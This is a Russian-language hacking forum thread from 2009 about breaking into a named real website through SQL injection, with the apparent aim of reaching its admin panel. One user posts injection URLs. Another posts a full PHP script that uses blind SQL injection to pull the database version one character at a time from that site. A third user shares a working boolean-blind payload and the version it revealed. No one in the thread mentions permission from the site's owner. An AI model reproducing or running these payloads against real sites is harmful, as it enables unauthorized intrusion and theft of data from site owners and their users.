04.11.2009, 17:27
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
http://home2.paulschou.net/tools/xlate/
|
|
|
04.11.2009, 17:46
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Как быть? Точно знаю что одна строка! А когда пишу:
...php?id=-24+union+select+1--
выдает:
The used SELECT statements have a different number of columns
как быть в такой ситуации?
|
|
|
|
04.11.2009, 17:49
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
дать ссылку сюды
|
|
|
|
04.11.2009, 17:53
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
|
|
|
|
04.11.2009, 18:58
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от Gemini12
http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
сплоит, он конечно кривоват, но работать должен:
PHP код:
<?php
#$chars="abcdef0123456789"; // для хеша
#$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz0123456789"; // для соли
$chars=".54367890012-ntlog"; // бд
$i=1;
$to=10;
$c=0;
$cc=0;
$data="";
$ebana="";
set_time_limit(0);
while($i<=$to) {
while($c<=strlen($chars)) {
echo $i.":".$chars[$c];
$sock=fsockopen("www.selo.kz", 80, $errno, $errstr, 5);
if(!$sock) die("hehe fuckin connect");
$ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)";
$h="POST /fspisok.php? HTTP/1.0\r\n";
$h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$h.="Content-Type: application/x-www-form-urlencoded\r\n";
$h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n";
$h.="Host: www.selo.kz\r\n";
$h.="Content-Length: ".strlen($ept)."\r\n";
$h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n";
$h.=$ept;
fwrite($sock, $h);
sleep(1);
$c++;
$data="";
while(!feof($sock)) {
$data=fgets($sock, 1024);
if(eregi("Subquery returns more than 1 row", $data)) { $cc=1; break; }
}
if($cc==1) { echo ":OKE!!1\r\n"; $ebana.=$chars[$c-1]; break; }
else echo ":FUCK!1\r\n";
fclose($sock);
}
$c=0;
$cc=0;
$i++;
}
echo $ebana;
?>
|
|
|
|
04.11.2009, 18:14
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Gemini12 я не искал но в указанном месте нет вывода ..так что крути как слепую..версия там 5.0.85-log
http://www.selo.kz/fspisok.php?id=24+AND+SUBSTRING((version()),1,1)=5--
|
|
|
|
04.11.2009, 19:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Aртем я думаю что для таких дел как раскрутка слепой скули есть много програм например сипт..кототрый поверь мне не настолько кривоват как твой скрипт..если конечно это твой скрипт
|
|
|
|
04.11.2009, 20:04
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
|
|
|
|
04.11.2009, 20:12
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Aртем
Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.
ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
|
|
|
|
04.11.2009, 20:15
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от Gorev
ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
Соотношение время-качество играет весомую роль. Зачастую нет времени делать качественно. Но здесь важно не качество, а результат, чего-бы это не стоило. 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
